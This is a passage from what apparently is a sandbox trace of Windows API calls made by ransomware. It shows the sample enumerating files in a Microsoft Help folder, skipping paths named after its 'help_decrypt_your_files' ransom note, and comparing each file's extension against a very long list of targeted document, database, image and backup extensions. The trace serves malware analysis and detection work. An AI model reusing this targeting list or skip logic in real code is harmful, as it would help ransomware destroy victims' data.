.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.878] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x523b1e39, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x523b1e39, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x52451c7e, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.ONENOTE.16.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1
	[0177.878] lstrcmpW (lpString1="MS.ONENOTE.16.1033.hxn", lpString2="..") returned 1
	[0177.878] lstrcmpW (lpString1="MS.ONENOTE.16.1033.hxn", lpString2=".") returned 1
	[0177.879] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.879] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.ONENOTE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.16.1033.hxn"
	[0177.879] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.16.1033.hxn") returned 56
	[0177.879] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.879] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.ONENOTE.16.1033.hxn", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn") returned 0x38
	[0177.879] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.879] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.879] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn"
	[0177.879] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.onenote.16.1033.hxn") returned 56
	[0177.880] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.880] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.880] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.880] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.880] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x60f38a13, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x60f38a13, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x6137f8c6, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.OUTLOOK.16.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1
	[0177.880] lstrcmpW (lpString1="MS.OUTLOOK.16.1033.hxn", lpString2="..") returned 1
	[0177.881] lstrcmpW (lpString1="MS.OUTLOOK.16.1033.hxn", lpString2=".") returned 1
	[0177.881] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.881] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.OUTLOOK.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.16.1033.hxn"
	[0177.881] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.16.1033.hxn") returned 56
	[0177.881] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.881] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.16.1033.hxn", cchLength=0x38 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn") returned 0x38
	[0177.881] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.881] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.881] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn"
	[0177.882] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.outlook.16.1033.hxn") returned 56
	[0177.882] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.882] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.882] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.882] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
